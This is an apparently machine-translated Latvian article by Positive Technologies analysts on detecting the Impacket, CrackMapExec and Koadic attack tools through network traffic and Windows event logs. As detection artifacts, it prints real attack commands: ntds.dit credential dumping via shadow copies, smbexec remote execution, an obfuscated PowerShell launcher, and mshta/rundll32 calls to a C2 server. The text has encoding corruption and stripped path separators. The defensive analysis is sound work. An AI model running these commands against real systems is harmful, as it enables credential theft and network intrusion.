Uzbrukumu skaits korporatÄ«vajÄ sektorÄ katru gadu pieaug: piemÄram
Ir vÄrts atzÄ«mÄt, ka Å”ie rÄ«ki netiek izmantoti sÄkotnÄjai iespieÅ”anai, bet gan uzbrukuma attÄ«stÄ«Å”anai infrastruktÅ«rÄ. UzbrucÄji tos izmanto dažÄdos uzbrukuma posmos pÄc iekļūŔanas perimetrÄ. To, starp citu, ir grÅ«ti noteikt un bieži vien tikai ar tehnoloÄ£iju palÄ«dzÄ«bu
Kas mums bija jÄdara:
- Izprotiet, kÄ darbojas uzlauÅ”anas rÄ«ki. Uzziniet, kas uzbrucÄjiem ir jÄizmanto un kÄdas tehnoloÄ£ijas viÅi var izmantot.
- Atrodiet to, ko informÄcijas droŔības rÄ«ki neatklÄj uzbrukuma pirmajos posmos. IzlÅ«koÅ”anas fÄzi var izlaist vai nu tÄpÄc, ka uzbrucÄjs ir iekÅ”Äjs uzbrucÄjs, vai arÄ« tÄpÄc, ka uzbrucÄjs izmanto infrastruktÅ«ras robu, kas iepriekÅ” nebija zinÄms. Kļūst iespÄjams atjaunot visu viÅa darbÄ«bu Ä·Ädi, lÄ«dz ar to arÄ« vÄlmi atklÄt turpmÄku kustÄ«bu.
- NovÄrsiet viltus pozitÄ«vus rezultÄtus no ielauÅ”anÄs noteikÅ”anas rÄ«kiem. MÄs nedrÄ«kstam aizmirst, ka tad, kad noteiktas darbÄ«bas tiek konstatÄtas, pamatojoties tikai uz izlÅ«koÅ”anu, ir iespÄjamas biežas kļūdas. Parasti infrastruktÅ«rÄ ir pietiekami daudz veidu, kas no pirmÄ acu uzmetiena nav atŔķirami no likumÄ«giem, lai iegÅ«tu jebkÄdu informÄciju.
Ko Å”ie rÄ«ki sniedz uzbrucÄjiem? Ja tas ir Impacket, tad uzbrucÄji saÅem lielu moduļu bibliotÄku, ko var izmantot dažÄdos uzbrukuma posmos, kas seko pÄc perimetra pÄrkÄpÅ”anas. Daudzi rÄ«ki iekÅ”Äji izmanto Impacket moduļus, piemÄram, Metasploit. Tam ir dcomexec un wmiexec attÄlai komandu izpildei, secretsdump kontu iegÅ«Å”anai no atmiÅas, kas tiek pievienoti no Impacket. RezultÄtÄ pareiza Å”Ädas bibliotÄkas darbÄ«bas noteikÅ”ana nodroÅ”inÄs atvasinÄjumu noteikÅ”anu.
TÄ nav nejauŔība, ka veidotÄji par CrackMapExec (vai vienkÄrÅ”i CME) uzrakstÄ«ja āPowered by Impacketā. TurklÄt CME ir gatava funkcionalitÄte populÄriem scenÄrijiem: Mimikatz paroļu vai to jaucÄjkodu iegÅ«Å”anai, Meterpreter vai Empire aÄ£enta ievieÅ”ana attÄlinÄtai izpildei un Bloodhound uz klÄja.
TreÅ”ais rÄ«ks, ko izvÄlÄjÄmies, bija Koadic. Tas ir pavisam nesen, tas tika prezentÄts starptautiskajÄ hakeru konferencÄ DEFCON 25 2017. gadÄ un atŔķiras ar nestandarta pieeju: darbojas, izmantojot HTTP, Java Script un Microsoft Visual Basic Script (VBS). Å o pieeju sauc par dzÄ«voÅ”anu Ärpus zemes: rÄ«ks izmanto sistÄmÄ Windows iebÅ«vÄtu atkarÄ«bu un bibliotÄku kopu. RadÄ«tÄji to sauc par COM Command & Control vai C3.
IMPACKET
Impacket funkcionalitÄte ir ļoti plaÅ”a, sÄkot no izlÅ«koÅ”anas AD iekÅ”ienÄ un datu vÄkÅ”anas no iekÅ”Äjiem MS SQL serveriem lÄ«dz akreditÄcijas datu iegÅ«Å”anas paÅÄmieniem: tas ir SMB releja uzbrukums un faila ntds.dit iegÅ«Å”ana, kas satur lietotÄju paroļu jaucÄjus no domÄna kontrollera. Impacket arÄ« izpilda komandas attÄlinÄti, izmantojot Äetras dažÄdas metodes: WMI, Windows Scheduler Management Service, DCOM un SMB, un, lai to izdarÄ«tu, ir nepiecieÅ”ami akreditÄcijas dati.
NoslÄpumu izgÄztuve
ApskatÄ«sim Secretsdump. Å is ir modulis, kas var mÄrÄ·Ät gan uz lietotÄju maŔīnÄm, gan domÄna kontrolleriem. To var izmantot, lai iegÅ«tu LSA, SAM, SECURITY, NTDS.dit atmiÅas apgabalu kopijas, tÄpÄc to var redzÄt dažÄdos uzbrukuma posmos. Pirmais solis moduļa darbÄ«bÄ ir autentifikÄcija, izmantojot SMB, kas prasa vai nu lietotÄja paroli, vai tÄ jaucÄjkodu, lai automÄtiski veiktu Pass the Hash uzbrukumu. TÄlÄk nÄk pieprasÄ«jums atvÄrt piekļuvi Service Control Manager (SCM) un piekļūt reÄ£istram, izmantojot winreg protokolu, ar kura palÄ«dzÄ«bu uzbrucÄjs var uzzinÄt interesÄjoÅ”o filiÄļu datus un iegÅ«t rezultÄtus, izmantojot SMB.
AttÄlÄ 1 mÄs redzam, kÄ tieÅ”i, izmantojot winreg protokolu, piekļuve tiek iegÅ«ta, izmantojot reÄ£istra atslÄgu ar LSA. Lai to izdarÄ«tu, izmantojiet komandu DCERPC ar opkodu 15 - OpenKey.
RÄ«si. 1. ReÄ£istra atslÄgas atvÄrÅ”ana, izmantojot winreg protokolu
PÄc tam, kad tiek iegÅ«ta piekļuve atslÄgai, vÄrtÄ«bas tiek saglabÄtas ar komandu SaveKey ar opkodu 20. Impacket to dara ļoti specifiskÄ veidÄ. Tas saglabÄ vÄrtÄ«bas failÄ, kura nosaukums ir 8 nejauÅ”u rakstzÄ«mju virkne, kas pievienota .tmp. TurklÄt Ŕī faila tÄlÄka augÅ”upielÄde notiek, izmantojot SMB no System32 direktorijas (2. att.).
RÄ«si. 2. ShÄma reÄ£istra atslÄgas iegÅ«Å”anai no attÄlÄs maŔīnas
IzrÄdÄs, ka Å”Ädu aktivitÄti tÄ«klÄ var noteikt pÄc vaicÄjumiem noteiktÄm reÄ£istra filiÄlÄm, izmantojot winreg protokolu, konkrÄtus nosaukumus, komandas un to secÄ«bu.
Å is modulis atstÄj pÄdas arÄ« Windows notikumu žurnÄlÄ, padarot to viegli nosakÄmu. PiemÄram, komandas izpildes rezultÄtÄ
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC
Windows Server 2016 žurnÄlÄ mÄs redzÄsim Å”Ädu galveno notikumu secÄ«bu:
1. 4624 - attÄlinÄta pieteikÅ”anÄs.
2. 5145 - piekļuves tiesÄ«bu pÄrbaude winreg attÄlajam pakalpojumam.
3. 5145 - failu piekļuves tiesÄ«bu pÄrbaude System32 direktorijÄ. Failam ir iepriekÅ” minÄtais nejauÅ”ais nosaukums.
4. 4688 ā cmd.exe procesa izveide, kas palaiž vssadmin:
āC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - procesa izveide ar komandu:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
6. 4688 - procesa izveide ar komandu:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
7. 4688 - procesa izveide ar komandu:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
Smbexec
TÄpat kÄ daudziem pÄcekspluatÄcijas rÄ«kiem, arÄ« Impacket ir moduļi komandu attÄlinÄtai izpildei. MÄs koncentrÄsimies uz smbexec, kas nodroÅ”ina interaktÄ«vu komandu apvalku attÄlÄ datorÄ. Å im modulim ir nepiecieÅ”ama arÄ« autentifikÄcija, izmantojot SMB, vai nu ar paroli, vai paroles jaucÄjkodu. AttÄlÄ 3. attÄlÄ redzams piemÄrs, kÄ Å”Äds rÄ«ks darbojas, Å”ajÄ gadÄ«jumÄ tÄ ir vietÄjÄ administratora konsole.
Rīsi. 3. Interaktīva smbexec konsole
Pirmais smbexec solis pÄc autentifikÄcijas ir SCM atvÄrÅ”ana ar OpenSCManagerW komandu (15). VaicÄjums ir ievÄrojams: lauks MachineName ir DUMMY.
RÄ«si. 4. PieprasÄ«jums atvÄrt Service Control Manager
PÄc tam pakalpojums tiek izveidots, izmantojot komandu CreateServiceW (12). Smbexec gadÄ«jumÄ mÄs katru reizi varam redzÄt vienu un to paÅ”u komandu uzbÅ«ves loÄ£iku. AttÄlÄ 5 zaļa norÄda nemainÄmus komandas parametrus, dzeltena norÄda, ko uzbrucÄjs var mainÄ«t. Ir viegli redzÄt, ka izpildÄmÄ faila nosaukumu, tÄ direktoriju un izvades failu var mainÄ«t, bet pÄrÄjo ir daudz grÅ«tÄk mainÄ«t, netraucÄjot Impacket moduļa loÄ£iku.
RÄ«si. 5. PieprasÄ«t pakalpojuma izveidi, izmantojot pakalpojumu kontroles pÄrvaldnieku
Smbexec arÄ« atstÄj acÄ«mredzamas pÄdas Windows notikumu žurnÄlÄ. OperÄtÄjsistÄmas Windows Server 2016 žurnÄlÄ interaktÄ«vÄs komandas apvalkam ar komandu ipconfig mÄs redzÄsim Å”Ädu atslÄgu notikumu secÄ«bu:
1. 4697 ā pakalpojuma uzstÄdÄ«Å”ana cietuÅ”Ä maŔīnÄ:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - cmd.exe procesa izveide ar argumentiem no 1. punkta.
3. 5145 - piekļuves tiesÄ«bu pÄrbaude __izejas failam C$ direktorijÄ.
4. 4697 ā pakalpojuma uzstÄdÄ«Å”ana cietuÅ”Ä maŔīnÄ.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - cmd.exe procesa izveide ar argumentiem no 4. punkta.
6. 5145 - piekļuves tiesÄ«bu pÄrbaude __izejas failam C$ direktorijÄ.
Impacet ir uzbrukuma rÄ«ku izstrÄdes pamats. Tas atbalsta gandrÄ«z visus Windows infrastruktÅ«ras protokolus, un tajÄ paÅ”Ä laikÄ tam ir savas raksturÄ«gÄs iezÄ«mes. Å eit ir norÄdÄ«ti konkrÄti winreg pieprasÄ«jumi un SCM API izmantoÅ”ana ar raksturÄ«gu komandu veidoÅ”anu, faila nosaukuma formÄts un SMB koplietoÅ”ana SYSTEM32.
CRACKMAPEXEC
CME rÄ«ks galvenokÄrt ir paredzÄts, lai automatizÄtu tÄs parastÄs darbÄ«bas, kas uzbrucÄjam ir jÄveic, lai pÄrvietotos tÄ«klÄ. Tas ļauj strÄdÄt kopÄ ar labi zinÄmo Empire aÄ£entu un Meterpreter. Lai komandas izpildÄ«tu slÄpti, CME var tÄs aizÄnot. Izmantojot Bloodhound (atseviŔķs izlÅ«koÅ”anas rÄ«ks), uzbrucÄjs var automatizÄt aktÄ«vÄs domÄna administratora sesijas meklÄÅ”anu.
Bloodhound
Bloodhound kÄ atseviŔķs rÄ«ks ļauj veikt uzlabotu izlÅ«koÅ”anu tÄ«klÄ. Tas apkopo datus par lietotÄjiem, iekÄrtÄm, grupÄm, sesijÄm un tiek piegÄdÄts kÄ PowerShell skripts vai binÄrs fails. InformÄcijas apkopoÅ”anai tiek izmantoti LDAP vai SMB protokoli. CME integrÄcijas modulis ļauj Bloodhound lejupielÄdÄt upura maŔīnÄ, palaist un saÅemt savÄktos datus pÄc izpildes, tÄdÄjÄdi automatizÄjot darbÄ«bas sistÄmÄ un padarot tÄs mazÄk pamanÄmas. Bloodhound grafiskais apvalks apkopo savÄktos datus grafiku veidÄ, kas ļauj atrast Ä«sÄko ceļu no uzbrucÄja maŔīnas lÄ«dz domÄna administratoram.
RÄ«si. 6. Bloodhound interfeiss
Lai palaistu upura maŔīnÄ, modulis izveido uzdevumu, izmantojot ATSVC un SMB. ATSVC ir saskarne darbam ar Windows uzdevumu plÄnotÄju. CME izmanto savu NetrJobAdd(1) funkciju, lai izveidotu uzdevumus tÄ«klÄ. PiemÄrs tam, ko CME modulis nosÅ«ta, ir parÄdÄ«ts attÄlÄ. 7: Å is ir cmd.exe komandas izsaukums un aptumÅ”otais kods argumentu veidÄ XML formÄtÄ.
7. att. Uzdevuma izveide, izmantojot CME
PÄc uzdevuma iesniegÅ”anas izpildei cietuÅ”Ä maŔīna pati iedarbina Bloodhound, un tas ir redzams satiksmÄ. Moduli raksturo LDAP vaicÄjumi, lai iegÅ«tu standarta grupas, visu iekÄrtu un lietotÄju sarakstu domÄnÄ un iegÅ«tu informÄciju par aktÄ«vajÄm lietotÄju sesijÄm, izmantojot SRVSVC NetSessEnum pieprasÄ«jumu.
Rīsi. 8. Aktīvo sesiju saraksta iegūŔana, izmantojot SMB
TurklÄt, palaižot Bloodhound upura maŔīnÄ ar iespÄjotu auditÄÅ”anu, tiek parÄdÄ«ts notikums ar ID 4688 (procesa izveide) un procesa nosaukums. Ā«C:WindowsSystem32cmd.exeĀ»
. IevÄrojami ir komandrindas argumenti:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , ā¦ , 40,41 )-jOIN'' ) "
Enum_avproducts
Modulis enum_avproducts ir ļoti interesants no funkcionalitÄtes un ievieÅ”anas viedokļa. WMI ļauj izmantot WQL vaicÄjumu valodu, lai izgÅ«tu datus no dažÄdiem Windows objektiem, kas bÅ«tÄ«bÄ ir tas, ko izmanto Å”is CME modulis. Tas Ä£enerÄ vaicÄjumus AntiSpywareProduct un AntiŠirusProduct klasÄm par aizsardzÄ«bas rÄ«kiem, kas instalÄti upura datorÄ. Lai iegÅ«tu nepiecieÅ”amos datus, modulis pieslÄdzas rootSecurityCenter2 nosaukumvietai, pÄc tam Ä£enerÄ WQL vaicÄjumu un saÅem atbildi. AttÄlÄ 9. attÄlÄ parÄdÄ«ts Å”Ädu pieprasÄ«jumu un atbilžu saturs. MÅ«su piemÄrÄ tika atrasts Windows Defender.
Rīsi. 9. Moduļa enum_avproducts tīkla darbība
Bieži vien WMI auditÄÅ”ana (Trace WMI-Activity), kuras pasÄkumos var atrast noderÄ«gu informÄciju par WQL vaicÄjumiem, var tikt atspÄjota. Bet, ja tas ir iespÄjots, tad, ja tiek palaists skripts enum_avproducts, tiks saglabÄts notikums ar ID 11. Tas saturÄs pieprasÄ«jumu nosÅ«tÄ«juÅ”Ä lietotÄja vÄrdu un vÄrdu rootSecurityCenter2 nosaukumvietÄ.
Katram no CME moduļiem bija savi artefakti, neatkarÄ«gi no tÄ, vai tie ir specifiski WQL vaicÄjumi vai noteikta veida uzdevuma izveide uzdevumu plÄnotÄjÄ ar obfuscÄÅ”anu un Bloodhound specifiskÄm darbÄ«bÄm LDAP un SMB.
KOADIC
Koadic atŔķirÄ«ga iezÄ«me ir sistÄmÄ Windows iebÅ«vÄto JavaScript un VBScript tulku izmantoÅ”ana. Å ajÄ ziÅÄ tas seko dzÄ«ves no zemes tendencei - tas ir, tam nav ÄrÄju atkarÄ«bu un tiek izmantoti standarta Windows rÄ«ki. Å is ir rÄ«ks pilnai Command & Control (CnC), jo pÄc inficÄÅ”anÄs iekÄrtai tiek uzstÄdÄ«ts āimplantsā, kas ļauj to kontrolÄt. Koadic terminoloÄ£ijÄ Å”Ädu maŔīnu sauc par āzombijuā. Ja upura pusÄ nav pietiekamu privilÄÄ£iju pilnÄ«gai darbÄ«bai, Koadic ir iespÄja tÄs palielinÄt, izmantojot lietotÄja konta kontroles apieÅ”anas (UAC bypass) metodes.
RÄ«si. 10. Koadic Shell
CietuÅ”ajam ir jÄuzsÄk saziÅa ar Command & Control serveri. Lai to izdarÄ«tu, viÅai jÄsazinÄs ar iepriekÅ” sagatavotu URI un jÄsaÅem galvenais Koadic korpuss, izmantojot vienu no skatuves. AttÄlÄ 11. attÄlÄ parÄdÄ«ts mshta stager piemÄrs.
RÄ«si. 11. Sesijas inicializÄcija ar CnC serveri
Pamatojoties uz atbildes mainÄ«go WS, kļūst skaidrs, ka izpilde notiek, izmantojot WScript.Shell, un mainÄ«gie STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE satur galveno informÄciju par paÅ”reizÄjÄs sesijas parametriem. Å is ir pirmais pieprasÄ«juma un atbildes pÄris HTTP savienojumÄ ar CnC serveri. TurpmÄkie pieprasÄ«jumi ir tieÅ”i saistÄ«ti ar izsaukto moduļu (implantu) funkcionalitÄti. Visi Koadic moduļi darbojas tikai ar aktÄ«vu sesiju ar CnC.
Mimikatz
TÄpat kÄ CME strÄdÄ ar Bloodhound, Koadic strÄdÄ ar Mimikatz kÄ atseviŔķu programmu, un tam ir vairÄki veidi, kÄ to palaist. TÄlÄk ir parÄdÄ«ts pieprasÄ«juma un atbildes pÄris Mimikatz implanta lejupielÄdei.
RÄ«si. 12. PÄrsÅ«tiet Mimikatz uz Koadic
Varat redzÄt, kÄ ir mainÄ«jies pieprasÄ«juma URI formÄts. Tagad tajÄ ir iekļauta vÄrtÄ«ba csrf mainÄ«gajam, kas ir atbildÄ«gs par atlasÄ«to moduli. NepievÄrsiet uzmanÄ«bu viÅas vÄrdam; MÄs visi zinÄm, ka CSRF parasti saprot atŔķirÄ«gi. Atbilde bija tÄ pati Koadic galvenÄ daļa, kurai tika pievienots kods, kas saistÄ«ts ar Mimikatz. Tas ir diezgan liels, tÄpÄc apskatÄ«sim galvenos punktus. Å eit mums ir Mimikatz bibliotÄka, kas kodÄta base64, serializÄta .NET klase, kas to ievadÄ«s, un argumenti Mimikatz palaiÅ”anai. Izpildes rezultÄts tiek pÄrsÅ«tÄ«ts tÄ«klÄ skaidrÄ tekstÄ.
RÄ«si. 13. Mimikatz palaiÅ”anas rezultÄts attÄlÄ maŔīnÄ
Exec_cmd
Koadic ir arÄ« moduļi, kas var izpildÄ«t komandas attÄlinÄti. Å eit mÄs redzÄsim to paÅ”u URI Ä£enerÄÅ”anas metodi un pazÄ«stamos sid un csrf mainÄ«gos. Moduļa exec_cmd gadÄ«jumÄ pamattekstam tiek pievienots kods, kas spÄj izpildÄ«t Äaulas komandas. TÄlÄk ir parÄdÄ«ts Å”Äds kods, kas ietverts CnC servera HTTP atbildÄ.
RÄ«si. 14. Implanta kods exec_cmd
Koda izpildei ir nepiecieÅ”ams mainÄ«gais GAWTUUGCFI ar pazÄ«stamo WS atribÅ«tu. Ar tÄs palÄ«dzÄ«bu implants izsauc apvalku, apstrÄdÄjot divus koda zarus - shell.exec ar izejas datu straumes atgrieÅ”anu un shell.run bez atgrieÅ”anÄs.
Koadic nav tipisks rÄ«ks, taÄu tam ir savi artefakti, pÄc kuriem to var atrast likumÄ«gÄ trafikÄ:
- īpaŔa HTTP pieprasījumu veidoŔana,
- izmantojot winHttpRequests API,
- izveidojot WScript.Shell objektu, izmantojot ActiveXObject,
- liels izpildÄmais korpuss.
SÄkotnÄjo savienojumu uzsÄk stadijas programma, tÄpÄc ir iespÄjams noteikt tÄ darbÄ«bu, izmantojot Windows notikumus. Mshta tas ir notikums 4688, kas norÄda uz procesa izveidi ar sÄkuma atribÅ«tu:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6
KamÄr Koadic darbojas, jÅ«s varat redzÄt citus 4688 notikumus ar atribÅ«tiem, kas to lieliski raksturo:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1
Atzinumi
Noziedznieku vidÅ« popularitÄti iegÅ«st tendence dzÄ«vot no zemes. ViÅi savÄm vajadzÄ«bÄm izmanto sistÄmÄ Windows iebÅ«vÄtos rÄ«kus un mehÄnismus. MÄs redzam, ka populÄri rÄ«ki Koadic, CrackMapExec un Impacket, ievÄrojot Å”o principu, arvien biežÄk parÄdÄs APT pÄrskatos. ArÄ« GitHub dakÅ”u skaits Å”iem rÄ«kiem pieaug, un parÄdÄs jauni (Å”obrÄ«d tÄdu ir jau aptuveni tÅ«kstotis). Å Ä« tendence kļūst arvien populÄrÄka tÄs vienkÄrŔības dÄļ: uzbrucÄjiem nav nepiecieÅ”ami treÅ”o puÅ”u rÄ«ki, tie jau atrodas upuru iekÄrtÄs un palÄ«dz viÅiem apiet droŔības pasÄkumus. MÄs koncentrÄjamies uz tÄ«kla komunikÄcijas izpÄti: katrs iepriekÅ” aprakstÄ«tais rÄ«ks atstÄj savas pÄdas tÄ«kla trafikÄ; detalizÄta to izpÄte ļÄva mums mÄcÄ«t mÅ«su produktu
Autori:
- Antons Tyurins, PT ekspertu droŔības centra pozitÄ«vo tehnoloÄ£iju ekspertu pakalpojumu nodaļas vadÄ«tÄjs
- Egors Podmokovs, PT ekspertu droŔības centra pozitīvo tehnoloģiju eksperts
Avots: www.habr.com